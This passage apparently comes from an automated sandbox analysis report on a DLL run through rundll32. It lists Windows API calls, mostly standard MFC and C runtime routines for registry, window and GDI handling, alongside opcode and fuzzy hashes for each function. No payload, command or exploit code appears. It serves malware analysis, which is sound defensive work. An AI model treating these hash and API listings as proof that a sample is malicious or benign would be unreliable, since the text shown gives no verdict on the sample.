                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseEnumH_prolog3_OpenQueryValue
                                                                                                          • String ID: Software\
                                                                                                          • API String ID: 1666054129-964853688
                                                                                                          • Opcode ID: 3dcc581e61560c1b2a89a559af4b2aadf043690cbf44cd43855230fa8fe55520
                                                                                                          • Instruction ID: 3764a028f082780bf1b34d3e1a3aecc110f1b9c57831791e493d608046546682
                                                                                                          • Opcode Fuzzy Hash: 3dcc581e61560c1b2a89a559af4b2aadf043690cbf44cd43855230fa8fe55520
                                                                                                          • Instruction Fuzzy Hash: 3C41AC35800128EBCB22DBA0CC81AEEB3B8FF49310F5045D9F249E2191DB34AB958F94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 100222EA
                                                                                                          • RegOpenKeyA.ADVAPI32(?,?,?), ref: 10022378
                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 1002239B
                                                                                                            • Part of subcall function 1002228B: __EH_prolog3.LIBCMT ref: 10022292
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnumH_prolog3H_prolog3_catch_Open
                                                                                                          • String ID: Software\Classes\
                                                                                                          • API String ID: 3518408925-1121929649
                                                                                                          • Opcode ID: 148a9a07ce493e8523daa3725bf67091589f603dbf0392a59fe7285a5da600ad
                                                                                                          • Instruction ID: 704202dc6e21b2fa8b48efa6eea704b7fc6a1643c8ca87a9ade3220d51c06aab
                                                                                                          • Opcode Fuzzy Hash: 148a9a07ce493e8523daa3725bf67091589f603dbf0392a59fe7285a5da600ad
                                                                                                          • Instruction Fuzzy Hash: A1317C36C00068EBDB22EBA4CD44BDDB6B8FB09350F5141D5F999A3252DA306FA49F91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetCapture.USER32 ref: 1002B279
                                                                                                          • SendMessageA.USER32 ref: 1002B294
                                                                                                          • GetFocus.USER32 ref: 1002B2A9
                                                                                                          • SendMessageA.USER32 ref: 1002B2B7
                                                                                                          • GetLastActivePopup.USER32(?), ref: 1002B2E0
                                                                                                          • SendMessageA.USER32 ref: 1002B2ED
                                                                                                            • Part of subcall function 1002881E: GetWindowLongA.USER32 ref: 10028844
                                                                                                            • Part of subcall function 1002881E: GetParent.USER32(?), ref: 10028852
                                                                                                          • SendMessageA.USER32 ref: 1002B313
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$ActiveCaptureFocusLastLongParentPopupWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3338174999-0
                                                                                                          • Opcode ID: 8b045ddbd33b9174f1829eda3b456e63d99d5e6e5f6e5226114c782d6a6a23be
                                                                                                          • Instruction ID: 3a08670cfc868389e080b955865bcb0f045f405a5b874c30a2897e43bb08e3ed
                                                                                                          • Opcode Fuzzy Hash: 8b045ddbd33b9174f1829eda3b456e63d99d5e6e5f6e5226114c782d6a6a23be
                                                                                                          • Instruction Fuzzy Hash: 7F1146B590065AFFEB11DFA1DD8AC9E7E7CEF41788B910075F504A2121EB719F04AB20
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 1002AB28
                                                                                                          • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1002AB4B
                                                                                                          • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1002AB67
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 1002AB77
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 1002AB81
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreate$Open
                                                                                                          • String ID: software
                                                                                                          • API String ID: 1740278721-2010147023
                                                                                                          • Opcode ID: ccb9b6360ff57769a68f726ed1728c19480870e0bb9bbd8d9feb64ffad4441d4
                                                                                                          • Instruction ID: fb36ca9c2f952ecb3db15ddf6cda8d32fba402c4719dfc4725c3bd37d29a496b
                                                                                                          • Opcode Fuzzy Hash: ccb9b6360ff57769a68f726ed1728c19480870e0bb9bbd8d9feb64ffad4441d4
                                                                                                          • Instruction Fuzzy Hash: 6B11E672900158FBDB11DB9ADD88CDFBFBDEB8A750B5000AAF504A2122D7319E44DBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 1002B013
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 1002B01D
                                                                                                            • Part of subcall function 100312CD: RaiseException.KERNEL32(?,?,1004B6B4,1004F1B8,?,?,?,100203CA,1004B6B4,1004F1B8,00000000,00000000), ref: 1003130F
                                                                                                          • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002B034
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B041
                                                                                                            • Part of subcall function 10023B23: __CxxThrowException@8.LIBCMT ref: 10023B39
                                                                                                          • _memset.LIBCMT ref: 1002B060
                                                                                                          • TlsSetValue.KERNEL32(?,00000000), ref: 1002B071
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B092
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 356813703-0
                                                                                                          • Opcode ID: 57ffba166e203e5f771fa8df9200c34d4f09cabdb1cbb7fcc74f3b72e3f2cbe0
                                                                                                          • Instruction ID: 36d3102e2cb30bc4552268f57227952f3745dc8c02fd82b3b9104c669509b869
                                                                                                          • Opcode Fuzzy Hash: 57ffba166e203e5f771fa8df9200c34d4f09cabdb1cbb7fcc74f3b72e3f2cbe0
                                                                                                          • Instruction Fuzzy Hash: DC115E74100605AFD725EF64DCC5D2BBBB9FF453107A0C529F969D6522CB30AC24CB94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetSysColor.USER32(0000000F), ref: 1002A956
                                                                                                          • GetSysColor.USER32(00000010), ref: 1002A95D
                                                                                                          • GetSysColor.USER32(00000014), ref: 1002A964
                                                                                                          • GetSysColor.USER32(00000012), ref: 1002A96B
                                                                                                          • GetSysColor.USER32(00000006), ref: 1002A972
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 1002A97F
                                                                                                          • GetSysColorBrush.USER32(00000006), ref: 1002A986
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$Brush
                                                                                                          • String ID:
                                                                                                          • API String ID: 2798902688-0
                                                                                                          • Opcode ID: 2aeb855fe3a01d91a1c159618acf838dda1bc2281205f0400994082937ea778a
                                                                                                          • Instruction ID: 2de359d209fd3f7b37bcce9053ec3ec9da3e309d31870537ed148616a4e248d0
                                                                                                          • Opcode Fuzzy Hash: 2aeb855fe3a01d91a1c159618acf838dda1bc2281205f0400994082937ea778a
                                                                                                          • Instruction Fuzzy Hash: 0BF0FE719407445BD730BF724E49B47BAD1FFC4710F02092EE2458B990D6B6E441DF44
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 1002326D
                                                                                                          • GlobalLock.KERNEL32 ref: 10023345
                                                                                                          • CreateDialogIndirectParamA.USER32(?,?,?,10022CA4,00000000), ref: 10023374
                                                                                                          • DestroyWindow.USER32(00000000,?,1000150C,00000000,00FD6546), ref: 100233EE
                                                                                                          • GlobalUnlock.KERNEL32(?,?,1000150C,00000000,00FD6546), ref: 100233FE
                                                                                                          • GlobalFree.KERNEL32 ref: 10023407
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3003189058-0
                                                                                                          • Opcode ID: 888fa3cfcf776247989f330621f25040a0e9d6be9df16a9d0be9406a16dfc2c2
                                                                                                          • Instruction ID: 542586d5134ef99c8f61472b69a72313b72e87743f096b2e8f632b75dff3f323
                                                                                                          • Opcode Fuzzy Hash: 888fa3cfcf776247989f330621f25040a0e9d6be9df16a9d0be9406a16dfc2c2
                                                                                                          • Instruction Fuzzy Hash: DD519B31A0024AEFCB04DFA4E9859AEBBB5EF04350F95442DF506E7292CB70AA45CB61
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetWindowLongA.USER32 ref: 10021ED2
                                                                                                          • GetParent.USER32(00000000), ref: 10021EE0
                                                                                                          • GetParent.USER32(00000000), ref: 10021EF3
                                                                                                          • GetLastActivePopup.USER32(00000000), ref: 10021F04
                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 10021F18
                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 10021F2B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                          • String ID:
                                                                                                          • API String ID: 670545878-0
                                                                                                          • Opcode ID: 472b318fd5bad27ffdf09f8c34eab2449045ee6e889f529d1c6834af2a2317c9
                                                                                                          • Instruction ID: f929a2de190b898985c8684475384bdcb1a7d6cc0d17529594567964d95cf4f5
                                                                                                          • Opcode Fuzzy Hash: 472b318fd5bad27ffdf09f8c34eab2449045ee6e889f529d1c6834af2a2317c9
                                                                                                          • Instruction Fuzzy Hash: 7711E73B5012725BDBA2DA65AD80BDF32D8EFB5AE1F830165EC24E7204D730CD0142D5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __CreateFrameInfo.LIBCMT ref: 10037760
                                                                                                            • Part of subcall function 10030430: __getptd.LIBCMT ref: 1003043E
                                                                                                            • Part of subcall function 10030430: __getptd.LIBCMT ref: 1003044C
                                                                                                          • __getptd.LIBCMT ref: 1003776A
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __getptd.LIBCMT ref: 10037778
                                                                                                          • __getptd.LIBCMT ref: 10037786
                                                                                                          • __getptd.LIBCMT ref: 10037791
                                                                                                          • _CallCatchBlock2.LIBCMT ref: 100377B7
                                                                                                            • Part of subcall function 100304D5: __CallSettingFrame@12.LIBCMT ref: 10030521
                                                                                                            • Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003786D
                                                                                                            • Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003787B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 1602911419-0
                                                                                                          • Opcode ID: 46636e942f87dcca0c30cf7feca0092d3b0ea187b49415045ba274b669f62aa0
                                                                                                          • Instruction ID: fb1f34f9027f5a0fd6fb665b034cbc12c1ee6665b85233a2d450c333db5c1a8f
                                                                                                          • Opcode Fuzzy Hash: 46636e942f87dcca0c30cf7feca0092d3b0ea187b49415045ba274b669f62aa0
                                                                                                          • Instruction Fuzzy Hash: 4F1104B9C04249EFDB01DFA4D945AEE7BB1FF08315F508469F814AB251DB38AA11DF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1315500227-0
                                                                                                          • Opcode ID: f0130467347104804c256745cbc3b6b13c5e57ae72556175195e5c4804d3d92f
                                                                                                          • Instruction ID: abcb09268cf445b2c35b0e2b56c0cfd5e9caec1888beec0722017402bcd9ce52
                                                                                                          • Opcode Fuzzy Hash: f0130467347104804c256745cbc3b6b13c5e57ae72556175195e5c4804d3d92f
                                                                                                          • Instruction Fuzzy Hash: FC018F32500126BBEB219F559D48EAF3BACFF463A1F414165FD15D6060DB30DA829A98
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memset
                                                                                                          • String ID: @$@$AfxFrameOrView90s$AfxMDIFrame90s
                                                                                                          • API String ID: 2102423945-455206835
                                                                                                          • Opcode ID: 7bcac898d79bec3422349b7028506952ff69134773f17cb7bb074026e0cf6295
                                                                                                          • Instruction ID: fa70bd333b2ddaae6f39455d5bc8e436e1dc58d3be4ecb045c2565641b92f197
                                                                                                          • Opcode Fuzzy Hash: 7bcac898d79bec3422349b7028506952ff69134773f17cb7bb074026e0cf6295
                                                                                                          • Instruction Fuzzy Hash: BD914175C00219ABDB80CFA4D581BDEBBF9EF48384F518065F908E7181EB749B84DBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetMenuCheckMarkDimensions.USER32 ref: 1002099A
                                                                                                          • _memset.LIBCMT ref: 10020A12
                                                                                                          • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 10020A75
                                                                                                          • LoadBitmapA.USER32 ref: 10020A8D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 4271682439-3916222277
                                                                                                          • Opcode ID: 33d2bf27483d04382989d274a53bbefd1c41525da4d7f4bc6e43fef10d3baaa5
                                                                                                          • Instruction ID: 8ec26202c106691d72478eed222520a6e30d1cb825b7d1c94e22465ec1c68f9d
                                                                                                          • Opcode Fuzzy Hash: 33d2bf27483d04382989d274a53bbefd1c41525da4d7f4bc6e43fef10d3baaa5
                                                                                                          • Instruction Fuzzy Hash: BD312772A003669FFB10CF289CC5B9D7BB5FB44340F9540AAF549EB182DA709E848B50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10025150
                                                                                                          • GetSystemMetrics.USER32 ref: 10025168
                                                                                                          • GetSystemMetrics.USER32 ref: 1002516F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: System$Metrics$InfoParameters
                                                                                                          • String ID: B$DISPLAY
                                                                                                          • API String ID: 3136151823-3316187204
                                                                                                          • Opcode ID: b6b25803d1236a503b5fcdcee7e41ccf2bd8b680c30ee70901717e7f43f6efc3
                                                                                                          • Instruction ID: b60a64a5d5410e3ad8fe5a59109b18ab5d44eebb328e5d1eff8611f1e2dd37b9
                                                                                                          • Opcode Fuzzy Hash: b6b25803d1236a503b5fcdcee7e41ccf2bd8b680c30ee70901717e7f43f6efc3
                                                                                                          • Instruction Fuzzy Hash: 4511E771901334AFEB52DF64DC85B9B7BA8EF45791F414061FD0AAE006D672D910CBE4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Edit
                                                                                                          • API String ID: 0-554135844
                                                                                                          • Opcode ID: ae77f75da73c1987e0fa940b5ef14957e5d7f7bc95fc6b37df26c4b3c60db9f7
                                                                                                          • Instruction ID: d6f5fafa54f95e57ce7326ac47ec6df47115e019fe7e1f47642f1b857b3d0bbf
                                                                                                          • Opcode Fuzzy Hash: ae77f75da73c1987e0fa940b5ef14957e5d7f7bc95fc6b37df26c4b3c60db9f7
                                                                                                          • Instruction Fuzzy Hash: 4611A131200205BBEE20DAA1AC05F5EB6ECFF46791F930929F956D64B1CF61DC80E564
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __getptd.LIBCMT ref: 1003748E
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __getptd.LIBCMT ref: 1003749F
                                                                                                          • __getptd.LIBCMT ref: 100374AD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
